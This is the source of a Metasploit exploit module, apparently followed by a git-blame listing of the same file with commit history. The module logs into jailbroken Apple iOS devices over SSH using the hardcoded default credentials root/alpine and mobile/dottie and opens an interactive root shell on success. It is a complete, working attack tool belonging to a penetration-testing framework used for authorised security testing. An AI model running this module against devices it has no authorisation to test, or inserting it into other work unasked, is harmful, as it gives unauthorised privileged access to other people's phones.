metasploit-framework/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::CommandShell
  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Apple iOS Default SSH Password Vulnerability",
      'Description'    => %q{
        This module exploits the default credentials of Apple iOS when it
        has been jailbroken and the passwords for the 'root' and 'mobile'
        users have not been changed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm'
        ],
      'References'     =>
        [
          ['OSVDB', '61284']
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Jul 2 2007",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end


  def rhost
    datastore['RHOST']
  end


  def rport
    datastore['RPORT']
  end


  def do_login(user, pass)
    factory = ssh_socket_factory
    opts = {
      auth_methods:    ['password', 'keyboard-interactive'],
      port:            rport,
      use_agent:       false,
      config:          false,
      password:        pass,
      proxy:           factory,
      non_interactive: true
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      ssh = nil
      return conn
    end

    return nil
  end


  def exploit
    self.target['accounts'].each do |info|
      user,pass = info
      print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
      conn = do_login(user, pass)
      if conn
        print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
        handler(conn.lsock)
        break
      end
    end
  end
end
Add ssh login module for cydia / ios defaults 2012-09-11 00:36:20 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add ssh login module for cydia / ios defaults 2012-09-11 00:36:20 +00:00			`##`

			`require 'net/ssh'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`

			`include Msf::Auxiliary::CommandShell`
first round of SSL damage fixes 2016-09-13 22:42:31 +00:00			`include Msf::Exploit::Remote::SSH`
Retab modules 2013-08-30 21:28:54 +00:00
			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Apple iOS Default SSH Password Vulnerability",`
			`'Description' => %q{`
			`This module exploits the default credentials of Apple iOS when it`
			`has been jailbroken and the passwords for the 'root' and 'mobile'`
			`users have not been changed.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'hdm'`
			`],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`'References' =>`
			`[`
			`['OSVDB', '61284']`
			`],`
Retab modules 2013-08-30 21:28:54 +00:00			`'DefaultOptions' =>`
			`{`
change exitfunc to thread 2015-09-01 08:43:45 +00:00			`'EXITFUNC' => 'thread'`
Retab modules 2013-08-30 21:28:54 +00:00			`},`
			`'Payload' =>`
			`{`
			`'Compat' => {`
			`'PayloadType' => 'cmd_interact',`
			`'ConnectionType' => 'find'`
			`}`
			`},`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Targets' =>`
			`[`
			`['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],`
			`],`
			`'Privileged' => true,`
			`'DisclosureDate' => "Jul 2 2007",`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`Opt::RHOST(),`
			`Opt::RPORT(22)`
			`], self.class`
			`)`

			`register_advanced_options(`
			`[`
			`OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),`
			`OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])`
			`]`
			`)`
			`end`


			`def rhost`
			`datastore['RHOST']`
			`end`


			`def rport`
			`datastore['RPORT']`
			`end`


			`def do_login(user, pass)`
move sshfactory into a mixin method use a convience method to DRY up creation of the SSHFactory inside modules. This will make it easier to apply changes as needed in future. Also changed msframework attr to just framework as per our normal convention MS-1688 2016-06-28 20:23:12 +00:00			`factory = ssh_socket_factory`
Retab modules 2013-08-30 21:28:54 +00:00			`opts = {`
fix more ssh option hashes 2016-09-20 06:30:35 +00:00			`auth_methods: ['password', 'keyboard-interactive'],`
			`port: rport,`
			`use_agent: false,`
			`config: false,`
			`password: pass,`
			`proxy: factory,`
			`non_interactive: true`
Retab modules 2013-08-30 21:28:54 +00:00			`}`

			`opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']`

			`begin`
			`ssh = nil`
			`::Timeout.timeout(datastore['SSH_TIMEOUT']) do`
			`ssh = Net::SSH.start(rhost, user, opts)`
			`end`
Differentiate failed binds from connects, closes #4169 This change adds two new Rex exceptions and changes the local comm to raise the right one depending on the circumstances. The problem with the existing model is that failed binds and failed connections both raised the same exception. This change is backwards compatible with modules that rescue Rex::AddressInUse in additi on to Rex::ConnectionError. There were two corner cases that rescued Rex::AddressInUse specifically: 1. The 'r'-services mixin and modules caught the old exception when handling bind errors. These have been updated to use BindFailed 2. The meterpreter client had a catch for the old exception when the socket reports a bad destination (usually a network connection dropped). This has been updat ed to use InvalidDestination as that was the intention prior to this change. Since AddressInUse was part of ConnectionError, modules and mixins which caught both in the same rescue have been updated to just catch ConnectionError. 2014-11-11 20:59:41 +00:00			`rescue Rex::ConnectionError`
Retab modules 2013-08-30 21:28:54 +00:00			`return`
			`rescue Net::SSH::Disconnect, ::EOFError`
			`print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"`
			`return`
			`rescue ::Timeout::Error`
			`print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"`
			`return`
			`rescue Net::SSH::AuthenticationFailed`
			`print_error "#{rhost}:#{rport} SSH - Failed authentication"`
			`rescue Net::SSH::Exception => e`
			`print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"`
			`return`
			`end`

			`if ssh`
prefer 'shell' channels over 'exec' channels for ssh If a command is not specified to CommandStream, request a "shell" session rather than running exec. This allows targets that do not have a true "shell" which supports exec to instead return a raw shell session. 2018-02-08 08:21:16 +00:00			`conn = Net::SSH::CommandStream.new(ssh)`
Retab modules 2013-08-30 21:28:54 +00:00			`ssh = nil`
			`return conn`
			`end`

			`return nil`
			`end`


			`def exploit`
			`self.target['accounts'].each do \|info\|`
			`user,pass = info`
			`print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")`
			`conn = do_login(user, pass)`
			`if conn`
OCD - print_good & print_error 2017-07-19 11:48:52 +00:00			`print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")`
Retab modules 2013-08-30 21:28:54 +00:00			`handler(conn.lsock)`
			`break`
			`end`
			`end`
			`end`
Add ssh login module for cydia / ios defaults 2012-09-11 00:36:20 +00:00			`end`